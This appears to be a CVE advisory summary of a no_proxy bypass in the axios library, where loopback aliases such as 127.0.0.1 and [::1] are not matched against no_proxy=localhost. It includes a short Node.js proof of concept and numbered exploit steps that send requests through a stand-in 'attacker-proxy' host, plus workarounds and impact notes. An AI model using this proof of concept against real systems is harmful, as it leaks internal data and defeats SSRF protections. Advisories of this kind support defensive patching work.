Axios, Hostname Normalization Bypass, CVE-2026-42038 (Medium)


The fix for no_proxy hostname normalization bypass (10661) is incomplete.
When no_proxy=localhost is set, requests to 127.0.0.1 and [::1] still route through the proxy instead of bypassing it.
The shouldBypassProxy() function does pure string matching — it does not resolve IP aliases or loopback equivalents.
As a result: no_proxy=localhost does NOT block 127.0.0.1 or [::1].

Also, no_proxy=127.0.0.1 does NOT block localhost or [::1].

The function fails to treat loopback addresses as equivalent.
An attacker can leverage this by using an IP alias instead of the hostname.

In server-side environments, this bypasses no_proxy restrictions.

Requests intended for internal/cloud metadata services (e.g., 169.254.169.254) can be redirected.
The attacker-controlled proxy receives the request, leaking sensitive data.
POC: process.env.no_proxy = 'localhost'; process.env.http_proxy = 'http://attacker-proxy:8888';
axios.get('http://127.0.0.1:7777/') goes to the proxy instead of directly.
Console output shows "PROXY RECEIVED REQUEST TO: http://127.0.0.1:7777/".
The internal server is never hit directly for IP addresses.

Only exact string matches work, not canonicalization.

This is a regression from an incomplete previous fix.
The vulnerability exists in all versions with the flawed shouldBypassProxy().
No DNS or IP resolution is performed on no_proxy entries.
IPv6 loopback [::1] is also not blocked when no_proxy=localhost.
Fix requires resolving loopback aliases as equivalent before matching.

dailycve form:

Platform: Axios
Version: Before fix
Vulnerability: no_proxy bypass
Severity: Medium
Date: 2026-04-01

Prediction: May 2026

What Undercode Say:

# Demonstrate incomplete no_proxy bypass
export no_proxy=localhost
export http_proxy=http://attacker-proxy:8888
export https_proxy=http://attacker-proxy:8888
# Run Node.js PoC
node -e "
const axios = require('axios');
(async () => {
  // This bypasses the proxy correctly
  await axios.get('http://localhost:7777/').catch(e => console.log('localhost:', e.message));
  // This does NOT bypass the proxy - it goes to the attacker proxy
  await axios.get('http://127.0.0.1:7777/').catch(e => console.log('127.0.0.1:', e.message));
})();
"

Exploit:

  1. Set no_proxy=localhost in environment.
  2. Attacker controls http_proxy (e.g., malicious proxy on port 8888).
  3. Application makes HTTP request to 127.0.0.1 (or ::1) using axios.
  4. shouldBypassProxy() does string match: "127.0.0.1" != "localhost".
  5. Request is sent to attacker proxy instead of localhost.
  6. Attacker proxy logs or forwards the request, leaking internal data.

Protection from this CVE

  • Upgrade axios to patched version once available (after May 2026).
  • Workaround: include all loopback aliases in no_proxy: "localhost,127.0.0.1,::1".
  • Use environment variable NO_PROXY with explicit IPs and hostnames.
  • Avoid using axios with proxy in sensitive server-side environments.
  • Implement custom proxy bypass function that resolves IP aliases.

Impact

  • Internal services on loopback (127.0.0.1, ::1) become reachable via attacker proxy.
  • Requests to cloud metadata endpoints (169.254.169.254) can be leaked if those addresses are aliased incorrectly in no_proxy.
  • SSRF protections relying on no_proxy are defeated.
  • Credentials, tokens, or internal configuration may be exfiltrated.


Sources:

Reported By: github.com